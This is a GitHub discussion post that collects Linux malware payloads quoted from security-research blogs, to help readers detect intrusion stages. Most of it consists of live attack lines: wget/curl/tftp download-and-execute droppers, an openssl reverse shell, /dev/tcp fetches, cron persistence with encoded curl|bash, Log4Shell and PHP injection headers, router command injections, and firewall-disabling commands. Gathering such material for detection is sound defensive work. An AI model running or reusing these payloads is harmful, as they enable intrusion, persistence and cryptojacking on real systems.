Collection of GNU/Linux malware payloads #1119

gustavo-iniguez-goya · 2024-04-26T15:01:03Z

gustavo-iniguez-goya
Apr 26, 2024
Collaborator

This is a collection of malware payloads, extracted from several security blogs. I'll update it from time to time, but if you have some more to share, post a comment and I'll update it.

Hopefully it'll help to understand the common stages of an intrussion: hack a service -> drop a file to /tmp/, /var/tmp, /dev/shm , ... -> open an outbound connection to remote url to download additional tools -> escalate privileges -> gain persistance

and suspicious behaviours:

apache/nginx/lighttpd opening an outbound connection? (it can be common sometimes, like jenkins/wordpress/... updating plugins, etc)
outbound connection initiated by a process that starts from a temporary directory? (/tmp/.1, /var/tmp/ ...)
outbound connection initiated by bash?

https://www.akamai.com/blog/security-research/updated-kmsdbot-binary-targeting-iot

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;pkill - 9 watchdog; wget http://xxx.xxx.xxx.xxx/386/watchdog; chmod +x watchdog;nohup ./watchdog </dev/null >/dev/null 2>&1 &; rm -rf watchdog
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.189.6.203/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 107.189.6.203 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 107.189.6.203; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *

https://www.akamai.com/blog/security-research/kmdsbot-the-attack-and-mine-malware

cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; rm -rf kumd*; rm -rf kumd; rm -rf kmsd; rm -rf kmsd*; wget -q http://1.2.3.4/unknown/kmsd || curl -s -o kmsd http://1.2.3.4/unknown/kmsd || tftp 1.2.3.4 -c get /unknown/kmsd || tftp -r /unknown/kmsd -g 1.2.3.4 || ftpget -v -u anonymous -p anonymous -P 21 1.2.3.4 -c get /unknown/kmsd; chmod 777 kmsd; chmod +x kmsd; nohup ./kmsd </dev/null >/dev/null 2>&1 &`

https://www.cisa.gov/news-events/analysis-reports/ar23-209c

setsid sh -c "mkfifo /tmp/p;sh -i </tmp/p 2>&1|openssl s_client -quiet -connect 107[.]148[.]223[.]196:8080 >/tmp/p 2>/dev/null;rm /tmp/p"

https://www.akamai.com/blog/security-research/cve-2023-26801-exploited-spreading-mirai-botnet

POST /goforms/set_limitClient.cfg HTTP/1.1\r\nCookie: user=admin\r\n\r\nntime=00:00-00:00&time2=00:00-00:00&mac=;wget http://1.2.3.4/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;\r\n\r\n

chroot, container escapes, use of gcc...
https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/

(multiple initial vectors, at the bottom of the post for more)

chroot /mnt /bin/sh -c 'if ! type curl >/dev/null; then apt-get install -y curl; apt-get install -y --reinstall curl; yum clean all; yum install -y curl; yum reinstall -y curl; fi; echo OdODKFfkfWOffmfqpPWkjdmMdnddd== | base64 -d - >/etc/crontab && echo OdODKFfkfWOffmfqpPWkjdmMdnddd== | base64 -d - >> /etc/crontab`

sh -c 'chroot /host; apt-get update; apt-get install -y curl bash wget; curl 1.2.3.4/dc.sh|bash'

sh -c 'chroot /host; apt-get update; apt-get install -y curl git g++ make bash wget; curl 1.2.3.4/k.sh|bash'

(ofuscated payload, url)

python -c "import urllib2; print urllib2.open('http://ki\\s\\s.a-d\\og.t\\o\p/t.sh')" >.1; chmod +x .1;./.1

(no payload) infecting VSCode, downloading external resources:
https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-chain-attack/

(use of docker image for cryptomining)
https://www.crowdstrike.com/blog/crowdstrike-discovers-first-ever-dero-cryptojacking-campaign-targeting-kubernetes/

(use of docker image for cryptomining)
https://www.crowdstrike.com/blog/lemonduck-botnet-targets-docker-for-cryptomining-operations/

/bin/sh -c 'echo '* * * * * export src=dockero; curl -fkSsL https://1.2.3.4/xxx/core.png?dockero*2.0 | bash''

https://www.crowdstrike.com/blog/new-docker-cryptojacking-attempts-detected-over-2021-holidays/

ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i /tmp/TeamTNT root@127.0.0.1 "(curl http://1.2.3.4/s3f1015/c/a.sh||cd1 http://1.2.3.4/s3f1015/c/a.sh||wget -q -O- http://1.2.3.4/s3f1015/c/a.sh||wd1 -q -O- http://1.2.3.4/s3f1015/c/a.sh)|bash"

https://www.cadosecurity.com/blog/qubitstrike-an-emerging-malware-campaign-targeting-jupyter-notebooks

curl -o /tmp/m.sh https://codeberg.org/m4rt1/sh/raw/branch/main/mi.sh ; chmod +x /tmp/m.sh ; /tmp/m.sh ; rm -f /tmp/m.sh ; history -c

https://www.cadosecurity.com/blog/migo-a-redis-miner-with-novel-system-weakening-techniques

set mimigo \r\n*/1 * * * * [ -f "/tmp/[.]xxx1" ] || { curl -sSL https://pastebin[.]com/raw/rE1jCdYS || wget -q0- https://pastebin[.]com/raw/rE1jCdYS; } | sh\n

https://www.cadosecurity.com/blog/redis-p2pinfect

set x "\n* * * * if ! ps | grep -v grep | grep -q 1234xxx; then exec 6<>/dev/tcp/1.2.3.4/666 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/1234xxx; fi && chmod +x /tmp/1234xxx && /tmp/1234xxx WeRrSDDDdRTRtRtdSfdSdfFdFeRreTGghgrH=="
bash -c "exec 6<>/dev/tcp/1.2.3.4/666 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/1234xxx ; fi && chmod +x /tmp/1234xxx && /tmp/1234xxx WeRrSDDDdRTRtRtdSfdSdfFdFeRreTGghgrH=="

attempt to bypass detections (by renaming wget, ...)

mv /usr/bin/wget /usr/bin/wgbtx;mv /usr/bin/curl /usr/bin/clbtx;iptables -F;iptables -P INPUT ACCEPT;iptables -P OUTPUT ACCEPT;if ! which iptables;then apt-get install -y iptables iptables-services || yum install -y iptables iptables-services || dnf install -y iptables iptables-services || zypper install -y iptables iptables-services || pacman -S --noconfirm iptables iptables-services;fi; if ! which awk;then apt-get install -y gawk || yum install -y gawk || dnf install -y gawk || zypper install -y gawk || pacman -S --noconfirm gawk;fi; if ! which netstat;then apt-get install -y net-tools || yum install -y net-tools || dnf install -y net-tools || zypper install -y net-tools || pacman -S --noconfirm net-tools;fi; redis_ips=$(netstat -tnp | grep &#39;:6379&#39; | grep &#39;ESTABLISHED&#39; | awk &#39;{print $5}&#39; | awk -F &#39;:&#39; &#39;{print $1}&#39; | sort -u);for ip in $redis_ips;do iptables -A INPUT -p tcp --dport 6379 -s &quot;$ip&quot; -j ACCEPT; done; iptables -A INPUT -p tcp --dport 6379 -j DROP; iptables -A INPUT -p tcp --dport &lt;port binary listens on&gt; -j ACCEPT

https://www.cadosecurity.com/blog/spinning-yarn-a-new-linux-malware-campaign-targets-docker-apache-hadoop-redis-and-confluence

     \u003e/usr/bin/vurl \u0026\u0026 chmod +x /usr/bin/vurl;echo '* * * * * root echo dnVybCBodHRwOi8vYi45LTktOC5jb20vYnJ5c2ovY3JvbmIuc2gK|base64 -d|bash|bash' \u003e/etc/crontab \u0026\u0026 echo '* * * * * root echo dnVybCBodHRwOi8vYi45LTktOC5jb20vYnJ5c2ovY3JvbmIuc2gK|base64 -d|bash|bash' \u003e/etc/cron.d/zzh \u0026\u0026 echo KiAqICogKiAqIHJvb3QgcHl0aG9uIC1jICJpbXBvcnQgdXJsbGliMjsgcHJpbnQgdXJsbGliMi51cmxvcGVuKCdodHRwOi8vYi45XC05XC1cOC5jb20vdC5zaCcpLnJlYWQoKSIgPi4xO2NobW9kICt4IC4xOy4vLjEK|base64 -d \u003e\u003e/etc/crontab"
    vurl http[:]//b[.]9-9-8[.]com/brysj/cronb.sh
    * * * * * root python -c "import urllib2; print urllib2.urlopen('http://b.9\-9\-\8.com/t.sh').read()" >.1;chmod +x .1;./.1

https://www.cadosecurity.com/blog/redis-miner-leverages-command-line-file-hosting-service

set Backup1 \t\n*/2 * * * * curl -s https://transfer[.]sh/QQcudu/tmp[.]fDGJW8BfMC > [.]cmd && bash [.]cmd\t\n

(generic wget/curl usage)
https://www.cadosecurity.com/blog/redis-miner-leverages-command-line-file-hosting-service
https://www.cadosecurity.com/blog/tales-from-the-honeypot-watchdog-evolves-with-a-new-multi-stage-cryptojacking-attack
https://www.cadosecurity.com/blog/previously-undiscovered-teamtnt-payload-recently-surfaced

log4shell:
https://www.cadosecurity.com/blog/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228

GET / HTTP/1.1\r\nHost: 1.2.3.4:443\r\n
User-Agent: ${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}//1.2.3.4:8081/w}
\r\nContent-Type: application/json
\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n

https://www.cadosecurity.com/blog/coinstomp-malware-family-targets-asian-cloud-service-providers

function __curl() {
 read proto server path <<<$(echo ${1//// })
 exec 3<>/dev/tcp/1.2.3.4/443
 echo -en "GET /web2/$1 HTTP/1.0\r\nHost: 1.2.3.4:443\r\n\r\n" >&3
 (while read line; do
  [[ "$line" == $'\r' ]] && break
  done && cat) <&3
 exec 3>&-
}

https://research.checkpoint.com/2024/magnet-goblin-targets-publicly-facing-servers-using-1-day-vulnerabilities/

cd pub;cd media;curl https : //theroots[.]in/pub/media/avatar/223sam.jpg -o cli &&chmod +x cli&&./cli;

worpress plugin vuln, from LFI to RCE:
https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers

GET /default/en_US/frame.html?content=3D..%2f..%2f..%2f..%2f..%2fproc%2fself%2fenviron HTTP/1.1\n
Host: 1.2.3.4\n
User-Agent: <?php chdir(sys_get_temp_dir()); file_put_contents("enemy", file_get_contents("http", "://1.2.3.4/folder/enemybotx86")); chmod("enemy", 0777); passthru("enemy"); ?>\n
Accept-Encoding: gzip, deflate\n
Accept: */*\n
User-Agent: <?php passthru("echo 'curl http://1.2.3.4/update.sh||wget -q -O - http://1.2.3.4/update.sh' | ba", "sh"); ?>\n

https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits

GET /ping.cgi?pingIpAddress=;cd /mnt;wget http://1.2.3.4/multi/wget.sh -O - > sfs; chmod 0777 sfs; sh sfs selfprep.comtrend;&sessionKey=
GET /goform/setUsbUnload/.js?deviceName=A;cd /tmp; rm wget.sh; wget http://1.2.3.4/shell/wget.sh; chmod 0777 wget.sh; sh wget.sh selfprep.tenda

target_addr=rm -rf /var/tmp/statinfo; wget http://1.2.3.4/arm/arm5/arm7/i586/i686/m68k/mips/mipsel/powerpc/sh4/sparc/x86_64bot.mips -O - > /var/tmp/statinfo; chmod 0777 /var/tmp/statinfo; /var/tmp/statinfo;

https://sysdig.com/blog/malware-analysis-shellbot-sysdig/

cd /tmp; wget http://1.2.3.4/54545asd5asd45as45/mizakotropistax64; curl -O http://1.2.3.4/54545asd5asd45as45/mizakotropistax64; cat mizakotropistax64 >x0000x;chmod +x *;nice -20 ./x0000x dedicated
cd /tmp; wget http://1.2.3.4/craton.pl -O /tmp/craton.pl; curl http://192.99.43.212/craton.pl -o /tmp/craton.pl; chmod 777 /tmp/craton.pl; perl /tmp/craton.pl; rm -rf /tmp/craton.pl; rm -rf /tmp/craton.pl.*

cd /tmp; wget http://1.2.3.4/bash.sh; curl http://1.2.3.4/bash.sh -o bash.sh; chmod 777 bash.sh; nohup bash bash.sh &

cd /tmp; wget http://1.2.3.4/ulimit.sh; curl http://1.2.3.4/ulimit.sh -o ulimit.sh; chmod 777 ulimit.sh; bash ulimit.sh; rm -rf ulimit.sh

cd /tmp; wget http://1.2.3.4/bot.pl -O /tmp/bot.pl --quiet; curl -s http://1.2.3.4/bot.pl -o /tmp/bot.pl; perl /tmp/bot.pl; rm -rf /tmp/bot.pl; rm -rf /tmp/bot.pl.1

mkdir /tmp/.logs/; cd /tmp; wget http://1.2.3.4/apachelogd -O /tmp/.logs/apachelogd; curl http://1.2.3.4/apachelogd -o /tmp/.logs/apachelogd; chmod +x /tmp/.logs/apachelogd; rm -rf /tmp/.logs/apachelogd.*

https://redcanary.com/blog/rocke-cryptominer/

(curl -fsSL hxxps://pastebin[.]com/raw/sF3gViaw || wget -q -O- hxxps://pastebin[.]com/raw/sF3gViaw)|base64 -d |/bin/bash`

(curl -fsSL --connect-timeout 120 hxxps://master[.]minerxmr[.]ru/One/c -o /var/tmp/config.json||wget hxxps://master[.]minerxmr[.]ru/One/c -O /var/tmp/config.json) && chmod +x /var/tmp/config.json

(curl -fsSL --connect-timeout 120 hxxps://master[.]minerxmr[.]ru/One/x1 -o /var/tmp/kworkerds||wget hxxps://master[.]minerxmr[.]ru/One/x1 -O /var/tmp/kworkerds) && chmod +x /var/tmp/kworkerds
nohup /var/tmp/kworkerds >/dev/null 2>&1 &

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Collection of GNU/Linux malware payloads #1119

{{title}}

Replies: 0 comments

Select a reply

Collection of GNU/Linux malware payloads #1119

gustavo-iniguez-goya Apr 26, 2024 Collaborator

Replies: 0 comments

gustavo-iniguez-goya
Apr 26, 2024
Collaborator